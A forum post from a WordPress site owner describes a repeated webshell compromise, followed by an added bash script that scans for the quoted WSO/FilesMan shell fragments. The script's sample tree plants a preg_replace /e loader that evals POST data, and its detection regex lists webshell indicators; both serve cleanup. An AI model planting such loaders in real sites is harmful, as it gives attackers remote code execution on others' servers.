I'm at a complete loss at this point.
Hackers have been compromising our WP 3.1.2 install for the last 5 days around the clock and managed to introduce both "<iframe..>" content into my secure wp-config.php and malware PHP files across several folders.
I tightened security all over the place, but they are still able to introduce new PHP files across the filesystem regardless of file and folder permissions:
Some of those malware files include content such as:
<?php
$auth_pass = "5bd3898279e9024046c38271e135db80";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
&
<?php
preg_replace("/aoRJfwFgvd1uhhs45xuh1R3y/e", "uOwQScq6H84YA5GeyGYHg04WJ8Pc
and other stuff. They even modified folder permissions and (!) .htaccess (perm: 440!).
I thought our system (new install, WordPress 3.1.2) was pretty secure to begin with, here is what else we did:
* _all_ folders _except_ the Super Cache folder are non-writable, mostly 550
* all of the typical .htaccess (and more) relevant settings are in place, perm = 400
* no POST without proper site REFERRER
* capturing other REQUEST TYPES, eg HEAD, TRACE...
* filtering QUERY_STRINGS
* wp-config, wp-admin, login are protected (apache login/pw)
* plus... roughly 60 lines dedicated to filter hack/spam attempts
* Secured WP via plugins (no version generator / capturing malicious requests)
* PHP.ini settings
* safe mode on, register_globals off, allow_url_fopen off etc.
* Server Quota in place
* wp-config.php has been replaced with a "dummy" pointing to a secure place
-> created a new secure folder (500) including a pseudo wp-config.php (400)
* new, secure wp-config, configured with
* define('WP_DEBUG', false);
* NEW $table_prefix
* Changed all passwords (DB, FTP, WP Logins)
* Ran a virus and Malware check on our local computers: they're clean
We're at a loss, any idea what else to look out for? Every other hour we start cleaning infected files afresh...
Thanks for anything you can think of....
F.
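The fragments quoted in the post are a WSO/"FilesMan" shell header and a preg_replace() call with the /e modifier, which on PHP of that era evaluates the replacement string as PHP code. As an added example (not part of the original post, and not a tool from WordPress or any plugin), the script below greps a document root for those indicators, lists PHP files sitting in upload/cache directories where WordPress never stores code, and shortlists recently modified files. The sample tree it builds is constructed for the demonstration; the file names in it are invented, and the indicator list is an assumption, not an exhaustive signature set.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: a triage scan for the kind of
# webshell fragments quoted above (WSO/FilesMan configuration, preg_replace
# with the /e modifier, eval() of a decoded payload) plus PHP dropped where
# WordPress never stores executable code. The sample tree below is
# constructed; point the scan functions at the real document root.

Q="[\"']"   # a single or double quote, used inside the regex below

# One extended regex, alternatives separated by '|':
#   FilesMan / $auth_pass / $default_use_ajax -> WSO-family shell configuration
#   preg_replace("...../e"                     -> /e evaluates the replacement as PHP
#   eval(base64_decode|gzinflate|...           -> encoded-payload loaders
WEBSHELL_PATTERNS="FilesMan|\\\$auth_pass[[:space:]]*=|\\\$default_use_ajax|preg_replace[[:space:]]*\\([[:space:]]*${Q}[^\"']*/[a-zA-Z]*e${Q}|eval[[:space:]]*\\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)"

# scan_php_indicators ROOT: print each PHP file under ROOT matching an
# indicator, one path per line, sorted. These are indicators, not proof:
# open every hit and read it.
scan_php_indicators() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \) \
        -exec grep -lE "$WEBSHELL_PATTERNS" {} + 2>/dev/null | sort
}

# find_php_in_data_dirs ROOT: PHP files under uploads/ or cache/, which hold
# media and cached HTML, never legitimate PHP.
find_php_in_data_dirs() {
    find "$1" -type f -name '*.php' \
        \( -path '*/wp-content/uploads/*' -o -path '*/wp-content/cache/*' \) | sort
}

# files_changed_within ROOT MINUTES: everything modified recently; on a box
# being reinfected every few hours this is the list to diff and read first.
files_changed_within() {
    find "$1" -type f -mmin "-$2" | sort
}

# Constructed sample tree: three clean files and two planted ones.
build_sample_tree() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/wp-includes" "$root/wp-content/uploads/2011/05" "$root/wp-content/plugins/demo"
    cat > "$root/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
$table_prefix = 'xq7_';
EOF
    # clean: preg_replace without /e, base64_decode without eval
    cat > "$root/wp-includes/formatting.php" <<'EOF'
<?php
function collapse_ws($s) { return preg_replace("/\s+/", " ", $s); }
EOF
    cat > "$root/wp-content/plugins/demo/demo.php" <<'EOF'
<?php
$blob = base64_decode($_POST['data']);
EOF
    # planted: WSO/FilesMan shell header (hash as quoted in the post)
    cat > "$root/wp-content/uploads/2011/05/image.php" <<'EOF'
<?php
$auth_pass = "5bd3898279e9024046c38271e135db80";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
EOF
    # planted: preg_replace /e loader (constructed stand-in for the truncated fragment)
    cat > "$root/wp-includes/cache-helper.php" <<'EOF'
<?php
preg_replace("/x/e", "eval(base64_decode(\$_POST['c']))", "x");
EOF
    printf '%s\n' "$root"
}

main() {
    local root
    root="$(build_sample_tree)"
    echo "== webshell indicators =="
    scan_php_indicators "$root"
    echo "== PHP in upload/cache directories =="
    find_php_in_data_dirs "$root"
    echo "== files changed in the last 120 minutes =="
    files_changed_within "$root" 120
    rm -rf "$root"
}

main
```

Run it as the web server user to see the attacker's view: anything it can modify under the document root is a candidate drop point, whatever the permissions look like from the FTP account. Note that the scan only finds what is on disk; if files keep coming back after a clean, the writer is still present somewhere (a shell the scan missed, another site on the same server, or a credential the attacker still holds), and the recently-modified list is the quickest way to see what it touches first.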